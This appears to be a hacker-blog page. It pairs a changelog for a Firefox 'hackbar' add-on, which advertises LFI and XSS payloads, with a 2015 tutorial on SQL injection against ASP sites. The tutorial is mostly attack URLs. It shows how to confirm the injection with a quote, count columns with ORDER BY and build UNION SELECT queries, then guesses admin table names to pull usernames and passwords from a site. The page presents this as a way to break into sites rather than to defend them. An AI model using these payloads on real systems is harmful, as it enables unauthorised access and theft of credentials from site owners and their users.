2:- Added Some great looks and design to this Version.
3:- Added Payloads for LFI.
4:- Added payloads for XSS.
5:- Added Source Code Viewer Add-on (Shortcut Button).

=========================================================================
6:- Added Links to:-
=========================================================================
a: Official Blog
b: Security Idiots
c: Add-on link for Source code viewer etc.


=========================================================================       Bug Fixations
=========================================================================1:- Bug Fixed of Replace Button.
2:- Bug fixed of base64spacer
3:- Bug Fixed for LiveHTTPHeader "Reply" Button.

Special Thanks to.
    Yogesh Bhagat (Sweetyow) & 
Janus Slovan For testing. 
Greetz To:-
            Ashx khan , MakMan , Zen , Rummy Khan , AnAs Ali , Amir_Dz , 

           Base64 , Ur0xm , Sn00.py , Shahmeer Amir , Danish Iqbal.
=========================================================================    ./r0ot@H3X49

Click Here to Download :- Download Now
 ========================================================================      Some Pics
=========================================================================
 To Make Look Like this Just Change your default FireFox theme to any them having black background.
  One link of Theme is also given in this hackbar.
 Go to "UNION BASED" Menu and the Label named "LINKS" have the Link of  "Theme" ..

New Hack bar



New Hack bar


New Hack bar






Saturday, April 4, 2015

MSSQL [asp] Sql injection

The sql injection on asp is same as on php...but a little bit of changes are made...

So first of all we will find some site that is Vulnerable and is on .asp

So assume that u got a site with the name of


Code:
http://www.target.com/


now find page where the site is vul to sql injection...

You can check the Vulnerability by adding single quotation '
at the end of URL like

Code:
http://www.target.com/product.asp?id=13'


If u get this error...

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'department_id=1024''.
/deptdet.asp, line 122
Then this means the site is vul to sql injections...Now we are going to find the columns in it...Normally we use -- at the end of string but in this case we will be using #

Code:
http://www.target.com/product.asp?id=13 order by 1#

Suppose that the site has 10 columns...when you will use the query "order by 1#" (without double quotations)
You will not get any error...the page will load normally...but when you will use the query "order by 11#" (without double quotations) you will get an error this means that the site has 10 columns...

So we will have an error on this query

Code:
http://www.target.com/product.asp?id=13 order by 11#

But when we will use this query, we will not get any error.

Code:
http://www.target.com/product.asp?id=13 order by 10#

This tells us that the table has 10 columns.

Now we will write the query as...

Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#


So now in next step we need name of a table to get number of largets visible column from all .. let me explain bit , like in simple sql injection we use union select 1,2,3,4,5,6 -- and we get a number to get information from site , in this we need a table name to get that number of visible column ,

so to get that number we are going to add name of table after union select 1,2,3,4,5,6,7, ..,10

in this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are " admin,tbladmin,tbl_admin,user,users,login,info,email" etc . Suppose in the site we got admin table that is visible. Now our url will look like

Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#


After this we will get number of largest visible column which we can use to get data from site. Suppose we got 3,7and 6 columns that are visible...

So now we are going to use 3 to get information now all we have to do is just put the name of column instead of 3 in string and we will get username and password ,

Now our URL will look like

Code:
http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#
Suppose we got a username instead of the number 3.

and then change column name with passwords column name
you will get the password ;)
URL will be like

Code:
http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#

Author : LAFANGA